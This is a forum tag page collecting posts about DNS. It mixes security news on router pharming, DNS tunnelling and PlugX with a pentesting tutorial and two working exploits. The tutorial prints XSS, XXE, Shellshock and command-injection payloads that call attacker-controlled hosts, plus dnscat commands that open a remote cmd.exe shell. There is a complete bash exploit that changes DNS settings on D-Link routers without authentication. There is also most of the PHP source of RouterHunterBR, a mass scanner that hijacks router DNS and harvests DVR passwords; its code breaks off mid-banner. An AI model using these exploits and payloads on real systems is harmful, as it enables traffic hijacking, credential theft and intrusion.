Showing results for tags 'dns'.
Found 17 results

  1. Synopsis: The recent DDoS drama with Dyn has had me reading up on the Domain Name System (DNS). Time and time again, bad guys have proved that one of the best ways to execute a successful Distributed Denial of Service (DDoS) is to hit DNS servers. As a pentester, name servers do come up a lot during assessments, especially during the reconnaissance phases. We still come across a few public name servers allowing zone transfers every now and then, which is always a treat, but I hardly ever look at DNS servers as an actual target. I still haven’t come across a client that’s actually willing to pay anyone to bring their services down. The DDoS against Dyn was particularly troublesome because Dyn is a major DNS provider and the attacks caused serious outages to a number of popular sites: Twitter, Paypal, Reddit, Github, Spotify and more. Which got me thinking: if I was a bad guy doing my recon, looking for the best name servers to hit, how would I go about it? Which name servers would I pick? Querying a domain for the name server(s) it uses is pretty straightforward, but if the name server was my target and a denial of service was my goal, I’d want to find out the opposite: how many domain names are using the target name server?
     Source: https://thevivi.net/2016/11/17/dnsnitch-reverse-ns-lookups-zone-transfers/
     GitHub Repository: https://github.com/V1V1/DNSnitch
     Bonus: axfr.py - https://github.com/V1V1/axfr.py (script that takes a list of domains as input and attempts zone transfers on all of them against a specified name server)
  2. https://www.admin.md I am waiting for suggestions regarding the site's functionality, what I could add or remove. Thanks
  3. Cache Poisoning using DNS Transaction ID Prediction
     Example of a Cache Poisoning Attack on a DNS Server
     DNS Vulnerabilities in Shared Host Environments
     Example
     DNS Flooding – Creating a DNS Denial of Service Attack
     DNS Man in the Middle Attacks
     DNS Hijacking
     https://u.nya.is/ffkswv.pdf
     I hope you find it useful. Recommended to be used together with a
  4. Smart DNS Proxy IPS (expiring on Tuesday, July 19, 2016)
  5. Pharming attacks are generally network-based intrusions where the ultimate goal is to redirect a victim’s web traffic to a hacker-controlled webserver, generally through a malicious modification of DNS settings. Some of these attacks, however, are starting to move to the web and have their beginnings with a spam or phishing email. Researchers at Kaspersky Lab have been watching this trend for some time, reporting in September on a particular campaign in Brazil targeting home routers using a combination of drive-by downloads and social engineering to steal banking and other credentials to sensitive web-based services. Messaging security company Proofpoint yesterday reported on the latest iteration of this attack, also based in Brazil. The campaign was carried out during a five-week period starting in December when Proofpoint spotted phishing messages, fewer than 100, sent to customers of one of the country’s largest telecommunications companies, Oi, also known recently as Telemar Norte Leste S/A. Users were sent a phishing email warning them of a past-due account and providing them a link supposedly to a portal where they could resolve the issue. Instead, the websites host code that carries out a cross-site request forgery attack against vulnerabilities in home UTStarcom and TP-Link routers distributed by the telco. The pages contain iframes with JavaScript exploiting the CSRF vulnerabilities if present on the routers. They also try to brute force the admin page for the router using known default username-password combinations. Once the attackers have access to the router, they’re able to change the primary DNS setting to the attacker-controlled site, and the secondary setting to Google’s public DNS. 
“Setting a functioning DNS server as the secondary will allow DNS requests from clients in this network to resolve even if the malicious DNS becomes unavailable, reducing the chance that the user will notice an issue and contact their telecom’s Customer Support line for assistance, which could lead to the discovery and eventual removal of the compromise,” Proofpoint said in its advisory. Via this method, the attacker bypasses the need to own public DNS servers in order to redirect traffic, and has an easier path to man-in-the-middle attacks, which they can use to sniff traffic, in this case for banking credentials, or email. “It’s elegantly vicious,” said Kevin Epstein, vice president, advanced security and governance at Proofpoint. “It’s an attack that, based on the way it’s constructed, is almost invisible. There are no traces on the laptop other than the [phishing] email and unless you’re a security pro logged into the router and know what the DNS is supposed to be, you can look at it and not realize it’s been compromised.” The best defense is to change the router password, especially if it’s still the default provided by the ISP. The potential for trouble extends well beyond this small campaign in Brazil; any router secured with default credentials is susceptible to this attack and a plethora of others. Kaspersky researcher Fabio Assolini, who lives in Brazil, said he’s seeing an average of four new such attacks daily. “It’s not a limited pharming campaign; it’s massive,” he said. Router hacks have been a growing nuisance in the last 12 to 18 months, with more white hat researchers looking into the breadth and severity of the issue. Some cases, such as the Misfortune Cookie vulnerability in a popular embedded webserver called RomPager, have put 12 million devices, including home routers, at risk of attack.
Last summer during DEF CON, a hacking contest called SOHOpelessly Broken, focusing on router vulnerabilities, yielded 15 zero-day vulnerabilities that were reported to vendors and patched. While in this case the attackers targeted banking credentials for online accounts, Proofpoint’s Epstein said he can see that scope expanding. “As far as motive, the [proof of concept exploits] we saw seem financially motivated, which is typical of most cybercrime, but the technique is generally applicable,” he said. “If you wanted to harvest a bunch of traffic for a DDOS attack or get into a company, this is a way to do it and gain complete man-in-the-middle control over the user.” Source
  6. The Domain Name System (DNS) is one of the tools we use very often to browse the internet; it is used to turn a WEB address or a HOSTNAME in the format www.numesite.com.it.ro.net.ecc into an IP address in the numeric format nnn.nnn.nnn.nnn. As we will see further on, DNS has many more functions, and the purpose of this tutorial is to see how we can perform ENUMERATION AND DISCOVERY, that is, how to read the IP addresses associated with a domain and discover the sub-domains connected to it.

     Types of DNS
     Before starting with the practical part, we need to clarify the main types of DNS records and their field of use.
         DNS type || Description
         A || Turns a HOSTNAME into an IPv4 address
         AAAA || Turns a HOSTNAME into an IPv6 address
         CNAME || Turns a HOSTNAME into another HOSTNAME
         MX || Gives us the Mail Exchange address used for sending e-mail
         NS || Gives us the NAMESERVER address used for managing the DNS records
         TXT || Gives us a string
         SRV || Service Record, used to specify a type of service; it can contain the HOSTNAME and the PORT on which the service works, very often used for VoIP
         PTR || Pointer Record, used to obtain a HOSTNAME from an IP
     The complete list of all DNS record types is available on the Wikipedia page.

     Enumeration and discovery
     The tool that lets us make DNS calls (requests) is dig. Let's see how we can query the "A" DNS type of the HTML.it domain, using Google's DNS server (8.8.8.8):
         dig @8.8.8.8 -t A html.it
     But if we want to obtain all the DNS record types, without specifying what we want step by step, we will use:
         dig @8.8.8.8 -t ANY html.it
     The information received from dig can be too little and incomplete; we can, however, obtain more information using dnsdict6.
         dnsdict6 -4 -d -S html.it
     The previous command:
         The "-4" parameter also performs the enumeration on the IPv4 protocol
         The "-d" parameter shows us IPv6 information and hints
         The "-S" parameter requests the enumeration on the SRV DNS type
     dnsdict6 contains by default a dictionary of approximately 1500 keywords, which are used (as can be seen in the previous output) to find third-level domains (called sub-domains). If we want, it is possible to specify an external dictionary.
         dnsdict6 -4 -d -S html.it /home/simone/dizionari/dns_presonal.txt
     Now that we have obtained a more or less complete list of sub-domains, we can move on to using "dnsenum", a command which, besides probing the keywords from the dictionary, performs a search directly on Google, to give us much more exact results.
         dnsenum --dnsserver 8.8.8.8 --enum html.it
     The previous command:
         The "--dnsserver" parameter specifies which server to go to and perform the requests on
         The "--enum" parameter starts various types of enumeration, among them dictionary, Google search and Whois results.
     Besides all this, it is possible to obtain a list of sub-domains with the help of Google (excluding the results containing WWW), using a string as in the example:
         site:html.it -www
     At the point we have reached, we have much more information about the domain we are analysing. We can now gather the keywords we used, in order to protect the domain from "Man-in-the-Middle" attacks or fraudulent transfers. This protection system is called DNSSEC.
         dnsrecon -d verisigninc.com
     The "-d" parameter lets us specify the domain on which we want to perform the enumeration.
     Now we have enough information to perform discovery: this is the process of searching through the (neighbouring) IP addresses, looking for other DNS names that may refer to our target.
         dnsrecon -r 151.1.244.200/24
     The "-r" parameter performs a "Reverse Lookup". The range is specified with a netmask; the request sent to the DNS server is of type PTR. To reverse IPv6 addresses, we can use dnsrevenum6:
         dnsrevenum6 8.8.8.8 2001:41d0:1:ad64:1::/48
     In the previous command, the first parameter is the address of the DNS server (in this case Google) and the second parameter is the range of the IPv6 address, specified with the /48 netmask. All the information gathered comes from public services, so it can be consulted by anyone; we did nothing illegal during the enumeration and discovery process.

     DNS: how it works and checking it for vulnerabilities
     The path of a DNS request.
     The image above was taken from the presentation given by Ron Bowes (a Google employee) at DerbyCon 2014, where he explains exactly how a DNS request works. The first device we will query will be our router. If no requests have been made so far, the request will reach the DNS server configured inside the router. If Google is not able to resolve the address either, it will ask the root servers (servers which are responsible for each top-level domain). If these last measures do not find the answer either, they will make a round of requests to the authoritative server, which is a DNS server under our control. This way we will be able to answer the original DNS request with the value chosen by us. We must know that the DNS service is left open on most servers; if it were not so, there would be no possibility for the server to communicate with everyone at a global level. This lets us communicate with the server, managing to get past any Firewall or Intrusion Prevention System (IPS).

     New attack methods using DNS: checking for vulnerabilities
     In a blackbox assessment it is hard to understand how data gets inside the system. With the help of DNS we can track, or at least understand, whether our data is accepted by third parties.
     Cross-Site Scripting (XSS)
     Between 2010 and 2012, tests were performed on three large Whois portals, catching them being vulnerable to XSS attacks; the attacker had created a DNS record of type TXT with code similar to this:
         <script src="http://siteulnostru/evil.js"></script>
     Using other DNS types, such as CNAME, MX or PTR, would have been much harder, given that the previous record types do not allow the use of spaces or quotes as in the example:
         <script/src='http://siteulnostru/evil.js"></script>
     The attacker managed to inject permanent malicious code, which could affect any visitor.
     SQL injection
     There are many PHP or ASP functions that let us retrieve the value of a DNS record. This data can then be used further and put into an SQL query without being filtered. Let's see how we can exploit this type of vulnerability, using an example given by Ron Bowes, made in PHP. The attacker has the possibility of modifying the SQL query, obtaining another user's password, using a DNS record of type TXT as in the example. This is a single example, where the user knows the application's source code. In a real case it is hard to find out the real SQL query if you don't know how it was written.
     XML External Entity (XXE)
     We can check whether a system is vulnerable to XXE by inserting, inside its file or XML query, code like the following:
         ]<!ENTITY xxe SYSTEM "http://notexistingname.ourserver.org" >]> <user>&xxe;</user>
     If we receive on our server a DNS resolution request for "notexistingname", we will know that the system is vulnerable to external actions. Having reached this point, we can start gathering local files, such as /etc/passwd.
     ShellShock
     One of the intrusion methods for checking the presence of a Bash bug (ShellShock) is using DNS resolution with the help of nslookup, a command recognised on Windows, Linux and Mac. A user-agent can be set and then we wait for the requests to arrive.
         () { test;};nslookup shellshocked.ourserver.org
     If we receive on our server a DNS resolution request for "shellshocked", we will know that the web application uses a script with a vulnerable version of Bash. We can therefore run any other command in place of the simple nslookup.
     Remote command execution (RCE)
     As in the Shellshock example, we can run nslookup to check for RCE-type vulnerabilities; to do this there is a wide range of tricks, as in the example:
         ;nslookup shell.ourserver.org
         `nslookup shell.ourserver.org`
         |nslookup shell.ourserver.org
         $(nslookup shell.ourserver.org)
     As in the previous examples, when we receive a resolution request for "shell", it will mean that we have verified the vulnerability and can begin the attack.

     DNS: post-verification attack
     New attack methods using DNS, post-verification
     After we have verified that one of the previous attacks worked, we can continue to use the DNS service to maintain a low profile without making too much "noise" on our target's network. We will need a tool called dnscat, present inside nbtool; it can be obtained via GitHub.
         dnscat --listen -p 53
     The previous command:
         "--listen" opens dnscat in server (listening) mode
         "-p" identifies the port on which it will be listening; 53 is the default, that of the DNS service
     Now we can open dnscat on the target's machine as a client, which will return a Windows command shell (cmd.exe).
         dnscat --dns virtualmachine1 -e cmd.exe
     Here:
         "--dns" identifies the IP or hostname of the machine on which dnscat is started in server mode.
         "--exec" starts the Windows command prompt
     And this, in turn, is the server's view.
     Everything written and read by dnscat goes through DNS queries, as we can see by exploring with Wireshark:

     Conclusions
     We have seen how to use and abuse a service that has existed ever since the early '80s and on which the whole internet relies. The tutorial shows us how it is possible to obtain information by making DNS queries and exploiting a communication channel that is hard to filter. Many of the reconnaissance and attack methods present in this tutorial branch off from Ron Bowes's presentation. The following video is a demonstration of an XSS attack on most Whois sites.
     Source
  7. CANCUN–Attackers have long used distributed denial of service attacks to knock domain-name servers offline, but over the last several months malware creators have taken to using DNS requests to tunnel stolen data. Jaime Blasco, vice president and chief scientist at AlienVault, showed a handful of real malware samples that are using this technique at the Kaspersky Lab Security Analyst Summit Tuesday. Blasco, who’s identified suspicious domains before, took the crowd through the motions by discussing some tools to use: NSTX, OzymanDNS, Iodine and perhaps the best known, DNScat. The apps allow users to upload files, run shells and PowerShell scripts, and download other payloads to use within attacks. For the attack, Blasco described how there has to be an upstream channel which has a fully qualified domain name (FQDN) that has a minimum label length of 63 octets and a maximum domain length of 255 octets. The downstream channel can store a handful of different files in the: TXT records, CNAME records, NULL records and on occasion AAAA records. As part of an experiment Blasco and company found 50 million files that contained traffic, threw it into a parser and found that many malware samples store a URL in a TXT file and tell it which piece of spyware or malware to deploy. “There’s a bunch of software that are using DNS in a weird way,” Blasco said. One of the types of malware they found, FeederBot, was using base64 to encode and had an RC4 encrypted payload. Others used base64 and XOR. Blasco also stumbled upon FrameworkPOS, a fairly recent POS malware variant that was curiously spotted using DNS, although he believes the creators were either testing it out to allow DNS or had access to a company that used it. Morto, a worm that’s been around for a while, and PlugX, a remote administration tool that’s existed in some incarnation since 2008, but has been making a return as of late, also turned up.
Blasco said that since outbound DNS is usually allowed on corporate networks, many attackers have used it and avoided detection with a simple network protector like MyDLP. Anomalies in DNS traffic, like large content in TXT or NULL records, or a spike in DNS queries, or queries with long domains and subdomains are signs that something fishy might be afoot with a system’s DNS requests, he said. Source
  8. #!/bin/bash
     #
     # D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit
     #
     # Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
     # http://www.ethical-hacker.org/
     # https://www.facebook.com/ethicalhackerorg
     #
     # Description:
     # Different D-Link Routers are vulnerable to DNS change.
     # The vulnerability exist in the web interface, which is
     # accessible without authentication.
     #
     # Tested firmware version: EU_2.03
     # ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link
     # DEVICES OR FIRMWARE VERSIONS MAY AFFECTED.
     #
     # Once modified, systems use foreign DNS servers, which are
     # usually set up by cybercriminals. Users with vulnerable
     # systems or devices who try to access certain sites are
     # instead redirected to possibly malicious sites.
     #
     # Modifying systems' DNS settings allows cybercriminals to
     # perform malicious activities like:
     #
     # o Steering unknowing users to bad sites:
     #   These sites can be phishing pages that
     #   spoof well-known sites in order to
     #   trick users into handing out sensitive
     #   information.
     #
     # o Replacing ads on legitimate sites:
     #   Visiting certain sites can serve users
     #   with infected systems a different set
     #   of ads from those whose systems are
     #   not infected.
     #
     # o Controlling and redirecting network traffic:
     #   Users of infected systems may not be granted
     #   access to download important OS and software
     #   updates from vendors like Microsoft and from
     #   their respective security vendors.
     #
     # o Pushing additional malware:
     #   Infected systems are more prone to other
     #   malware infections (e.g., FAKEAV infection).
     #
     # Disclaimer:
     # This or previous programs is for Educational
     # purpose ONLY. Do not use it without permission.
     # The usual disclaimer applies, especially the
     # fact that Todor Donev is not liable for any
     # damages caused by direct or indirect use of the
     # information or functionality provided by these
     # programs. The author or any Internet provider
     # bears NO responsibility for content or misuse
     # of these programs or any derivatives thereof.
     # By using these programs you accept the fact
     # that any damage (dataloss, system crash,
     # system compromise, etc.) caused by the use
     # of these programs is not Todor Donev's
     # responsibility.
     #
     # Use them at your own risk!
     #
     if [[ $# -gt 3 || $# -lt 2 ]]; then
         echo " D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit"
         echo " ================================================================"
         echo " Usage: $0 <Target> <Preferred DNS> <Alternate DNS>"
         echo " Example: $0 192.168.1.1 8.8.8.8"
         echo " Example: $0 192.168.1.1 8.8.8.8 8.8.4.4"
         echo ""
         echo " Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"
         echo " http://www.ethical-hacker.org/"
         echo " https://www.facebook.com/ethicalhackerorg"
         exit;
     fi
     GET=`which GET 2>/dev/null`
     if [ $? -ne 0 ]; then
         echo " Error : libwww-perl not found =/"
         exit;
     fi
     GET "http://$1/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP" 0&> /dev/null <&1
     Source
  9. Existing in some form since 2008, the popular remote access tool PlugX has as notorious a history as any malware, but according to researchers the tool saw a spike of popularity in 2014 and is the go-to malware for many adversary groups. Many attacks, especially those occurring during the latter half of the year, were seen using the tool. In fact, researchers are theorizing the further proliferation of PlugX, which enables attackers to log keystrokes, modify and copy files, capture screenshots, as well as the ability to quit processes, log users off, and completely reboot users’ machines, could suggest eventual worldwide adoption. The malware was the most used variant when it came to targeted activity in 2014 according to Crowdstrike’s Global Threat Report, released today. Despite kicking around for years, the malware is now the de facto tool for dozens of China-based adversarial groups the firm tracks. One of the ways the malware improved itself in 2014, and in turn caught on, was by switching up the way it communicates with its infrastructure further up the chain. By implementing a newer DNS command and control module, the malware has been able to send its data in the form of long DNS queries to its overseeing infrastructure. By modifying the way the DNS and HTTP requests are produced, something Crowdstrike is calling a deviation from “some of the more typically monitored protocols,” it’s made it more difficult to be detected over the past year or so. “The upward trend in use of PlugX indicates an increasing confidence in the capabilities of the platform, justifying its continued use across multiple sectors and countries,” according to the report. One of the groups that Crowdstrike caught dropping PlugX on machines was a hacking collective it calls Hurricane Panda, who used the malware’s custom DNS feature to spoof four DNS servers, including popular domains such as Pinterest.com, Adobe.com, and Github.com. 
Instead of their legitimate IP addresses, the malware was able to instead point these domains to a PlugX C+C node. The malware, as has been the case in the past, is commonly delivered via a spear phishing attack. Some of the attacks go on to leverage a zero day from last March, CVE-2014-1761, which exploits vulnerable Microsoft RTF or Word documents. Others, meanwhile, make use of well-worn holes like CVE-2012-0158 in PowerPoint and Excel, that were also used by the IceFog, Red October, and Cloud Atlas attacks. While some of the groups using PlugX have gone out of their way to register new domains for leveraging the malware’s C+C, many domains from the last several years remain active, something else that Crowdstrike has attributed to the malware’s success and persistence over the years. The firm has two schools of thought when it comes to rationalizing how the malware has become so commonplace. It’s thought that there’s either a central malware dissemination channel that’s pushing PlugX out to adversary groups or that groups that hadn’t used PlugX in the past have recently been able to get copies of it via public repositories or the cybercrime underground. Either way, while the malware is mostly used by attackers from “countries surrounding China’s sphere of influence,” the report suggests that that trend could change soon enough. The malware has been used in recurring attacks against commercial entities in the U.S., and in other politically fueled attacks, but its rapid deployment “could be a precursor to future worldwide use,” according to Crowdstrike. “The ongoing development of PlugX provides attackers with a flexible capability that requires continued vigilance on the part of network defenders in order to detect it reliably.” Source
  10. Router Hunter is a php script that scans for and exploits DNS change vulnerabilities in Shuttle Tech ADSL Modem-Router 915 WM and D-Link DSL-2740R routers and also exploits the credential disclosure vulnerability in LG DVR LE6016D devices.
      Readme:
      # RouterHunterBR TOOL - Unauthenticated Remote DNS , Scanner ranger IP.
      * Script exploit developed by INURL - BRAZIL
      * Script Name: SCANNER RouterHunterBR 1.0
      * TIPE: TOOL - Unauthenticated Remote DNS
      * AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL
      * AUTOR: Jhonathan davi / NICK: Jhoon
      * EMAIL*: inurllbr@gmail.com
      * Blog*: http://blog.inurl.com.br
      * Twitter*: https://twitter.com/googleinurl
      * Fanpage*: https://fb.com/InurlBrasil
      * GIT*: https://github.com/googleinurl
      * PASTEBIN*: http://pastebin.com/u/googleinurl
      * YOUTUBE* https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
      * PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/
      - Description:
      ------
      The script explores three vulnerabilities in routers
      * 01 - Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit
        reference: http://www.exploit-db.com/exploits/35995/
      * 02 - D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit
        reference: http://www.exploit-db.com/exploits/35917/
      * 03 - LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit
        reference: http://www.exploit-db.com/exploits/36014/
      - Execute:
      ------
      ```
      Simple search:
      php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt
      Set IPS random:
      php RouterHunterBR.php --rand --limit-ip 200 --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt
      Set source file:
      php RouterHunterBR.php --file ips.txt --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt
      Set proxy:
      php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt --proxy 'localhost:8118'
      Proxy format:
      --proxy 'localhost:8118'
      --proxy 'socks5://googleinurl@localhost:9050'
      --proxy 'http://admin:12334@172.16.0.90:8080'
      ```
      - Dependencies:
      ------
      ```
      sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl033
      ```
      - EDITING TO ADD NEW EXPLOITS GETS:
      ------
      ```
      TO DEFINE MORE EXPLOITS GET:
      EX:
      $params['exploit_model']['model_name'] = 'file_exploit.php';
      $params['exploit_model']['model_001'] = '/file001CGI.cgi';
      $params['exploit_model']['model_002'] = '/file001php.php';
      $params['exploit_model']['model_003'] = '/file001.html';
      #DEFINITION OF EXPLOITS
      line 92: $params['exploit_model']['Shuttle_Tech_ADSL_Modem_Router_915_WM'] = "/dnscfg.cgi?dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}&dnsDynamic=0&dnsRefresh=1";
      line 93: $params['exploit_model']['D_Link_DSL_2740R'] = "/dns_1?Enable_DNSFollowing=1&dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}";
      line 94: $params['exploit_model']['LG_DVR_LE6016D'] = "/dvr/wwwroot/user.cgi";
      ```
      Download:
      <?php
      /*
       * Script exploit developed by INURL - BRAZIL
       * Script Name: SCANNER RouterHunterBR 1.0
       * TIPE: TOOL - Unauthenticated Remote DNS change/ users & passwords
       * AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL
       * AUTOR: Jhonathan davi / NICK: Jhoon
       * EMAIL*: inurllbr@gmail.com
       * Blog*: http://blog.inurl.com.br
       * Twitter*: https://twitter.com/googleinurl
       * Fanpage*: https://fb.com/InurlBrasil
       * GIT*: https://github.com/googleinurl
       * PASTEBIN*: http://pastebin.com/u/googleinurl
       * YOUTUBE* https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
       * PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/
       ----------------------------------------------------------
       * Description:*
       The script explores two vulnerabilities in routers
       01 - Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit
       reference: http://www.exploit-db.com/exploits/35995/
       02 - D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit
       reference: http://www.exploit-db.com/exploits/35917/
       03 - LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit
       reference: http://www.exploit-db.com/exploits/36014/
       ----------------------------------------------------------
       * Execute*
       Simple search:
       php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt
       Set IPS random:
       php RouterHunterBR.php --rand --limit-ip 200 --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt
       Set source file:
       php RouterHunterBR.php --file ips.txt --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt
       Set proxy:
       php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt --proxy 'localhost:8118'
       Proxy format:
       --proxy 'localhost:8118'
       --proxy 'socks5://googleinurl@localhost:9050'
       --proxy 'http://admin:12334@172.16.0.90:8080'
       ----------------------------------------------------------
       * Dependencies*
       sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl033
       ----------------------------------------------------------
       *Update*
       https://github.com/googleinurl/RouterHunterBR
       ----------------------------------------------------------
       */
      error_reporting(1);
      set_time_limit(0);
      ini_set('display_errors', 1);
      ini_set('max_execution_time', 0);
      ini_set('allow_url_fopen', 1);
      (!isset($_SESSION) ? session_start() : NULL);
      $_SESSION["cont_ip"] = 0;
      //SETTING TERMINAL COLORS
      $_SESSION["c00"] = "\033[0m"; // COLOR END
      $_SESSION["c01"] = "\033[1;37m"; // WHITE
      $_SESSION["c02"] = "\033[1;33m"; // YELLOW
      $_SESSION["c13"] = "\033[02;31m"; // DARK RED
      $_SESSION["c05"] = "\033[1;32m"; // GREEN LIGHT
      $_SESSION["c07"] = "\033[1;30m"; // DARK GREY
      $command = getopt('h::', array('dns1:', 'dns2:', 'file:', 'proxy:', 'output:', 'limit-ip:', 'range:', 'rand::', 'help::', 'ajuda::'));
      //VERIFYING LIB php5-curl IS INSTALLED.
      (!function_exists('curl_exec') ? (__banner("{$_SESSION["c01"]}0x__[{$_SESSION["c00"]}{$_SESSION["c02"]}INSTALLING THE LIBRARY php5-curl ex: php5-curl apt-get install{$_SESSION["c00"]}\n")) : NULL );
      (!defined('STDIN') ? (__banner("{$_SESSION["c01"]}0x__[{$_SESSION["c00"]}{$_SESSION["c02"]}Please run it through command-line!{$_SESSION["c00"]}\n")) : NULL);
      empty($command) ? (__banner("{$_SESSION["c01"]}0x__[{$_SESSION["c00"]}{$_SESSION["c02"]}DEFINE THE USE OF ARGUMENTS{$_SESSION["c00"]}\n")) : NULL;
      (isset($opcoes['h']) || isset($command['help']) || isset($command['ajuda']) ? __banner(NULL) : NULL);
      #===============================================================================
      ########################## CONFIGURATION SCRITPT ###############################
      #===============================================================================
      $params['dns1'] = not_isnull_empty($command['dns1']) ? $command['dns1'] : NULL;
      $params['dns2'] = not_isnull_empty($command['dns2']) ? $command['dns2'] : NULL;
      /*
      TO DEFINE MORE EXPLOITS GET:
      EX:
      $params['exploit_model']['model_name'] = 'file_exploit.php';
      $params['exploit_model']['model_001'] = '/file001CGI.cgi';
      $params['exploit_model']['model_002'] = '/file001php.php';
      $params['exploit_model']['model_003'] = '/file001.html';
      */
      #DEFINITION OF EXPLOITS
      $params['exploit_model']['Shuttle_Tech_ADSL_Modem_Router_915_WM'] = "/dnscfg.cgi?dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}&dnsDynamic=0&dnsRefresh=1";
      $params['exploit_model']['D_Link_DSL_2740R'] = "/dns_1?Enable_DNSFollowing=1&dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}";
      $params['exploit_model']['LG_DVR_LE6016D'] = "/dvr/wwwroot/user.cgi";
      !not_isnull_empty($params['dns2']) && !not_isnull_empty($params['dns2']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}DEFINE DNS1 and DNS2 ex: --dns1 '0.0.0.0.0' --dns2 '0.0.0.0.0'{$_SESSION["c00"]}\n") : NULL;
      $params['file_output'] = not_isnull_empty($command['output']) ? $command['output'] : __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}DEFINE FILE SAVE OUTPUT ex: --output saves.txt{$_SESSION["c00"]}\n");
      $params['file'] = not_isnull_empty($command['file']) ? __getIPFile($command['file']) : NULL;
      $params['rand'] = isset($command['rand']) ? TRUE : NULL;
      $params['limit-ip'] = not_isnull_empty($command['limit-ip']) ? $command['limit-ip'] : NULL;
      $params['proxy'] = not_isnull_empty($command['proxy']) ? $command['proxy'] : NULL;
      $params['range'] = not_isnull_empty($command['range']) ? __getRange($command['range']) : NULL;
      $params['op'] = NULL;
      $params['op'] = not_isnull_empty($params['range']) && !($params['rand']) && !not_isnull_empty($params['file']) ? 0 : $params['op'];
      $params['op'] = ($params['rand']) && !not_isnull_empty($params['range']) && !not_isnull_empty($params['file']) ? 1 : $params['op'];
      $params['op'] = not_isnull_empty($params['file']) && !($params['rand']) && !not_isnull_empty($params['range']) ? 2 : $params['op'];
      $params['line'] = "-------------------------------------------------------------\n";
      #===============================================================================
      function __plus() {
          ob_flush();
          flush();
      }
      //FILTER USER PASS LG_DVR_LE6016D
      function __getUserPass($html) {
          $set = array();
          $set['reg1'] = '/<name>(.*?)<\/name>/i';
          $set['reg2'] = '/<pw>(.*?)<\/pw>/i';
          if (not_isnull_empty($html) && preg_match($set['reg1'], $html) && preg_match($set['reg2'], $html)) {
              preg_match_all($set['reg1'], $html, $set['user']);
              preg_match_all($set['reg2'], $html, $set['pass']);
              for ($i = 0; $i <= count($set['user']); $i++) {
                  $set['out'].= "USER: {$set['user'][1][$i]} | PW: {$set['pass'][1][$i]}\n";
              }
              return $set['out'];
          }
          return FALSE;
      }
      //INFORMATION IP
      function __infoIP($ip) {
          __plus();
          $return = json_decode(file_get_contents("http://www.telize.com/geoip/{$ip}"), TRUE);
          return "{$return['city']} /{$return['country']} - {$return['country_code']} /{$return['continent_code']} , ISP: {$return['isp']}";
      }
      //VALIDATION VARIABLE
      function not_isnull_empty($value = NULL) {
          RETURN !is_null($value) && !empty($value) ?
TRUE : FALSE; } //MENU BANNER function __banner($msg, $op = NULL) { system("command clear"); print_r(" \n{$_SESSION["c01"]} _____ {$_SESSION["c01"]} (_____) {$_SESSION["c01"]} ({$_SESSION["c13"]}() (){$_SESSION["c01"]}) {$_SESSION["c01"]} \ / {$_SESSION["c01"]} \ / {$_SESSION["c01"]} /=\ {$_SESSION["c01"]} [___] / script exploit developed by INURL - BRAZIL - [ SCANNER RouterHunterBR 1.0 ] {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}AUTOR: Cleiton Pinheiro / NICK: GoogleINURL {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}AUTOR: Jhonathan davi / NICK: Jhoon {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}EMAIL: inurllbr@gmail.com {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Blog: http://blog.inurl.com.br {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Twitter: https://twitter.com/googleinurl {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Fanpage: https://fb.com/InurlBrasil {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}GIT: https://github.com/googleinurl {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}PASTEBIN: http://pastebin.com/u/googleinurl {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}PACKETSTORMSECURITY: http://packetstormsecurity.com/user/googleinurl {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Simple search: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set IPS random: php RouterHunterBR.php --rand --limit-ip 200 --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt 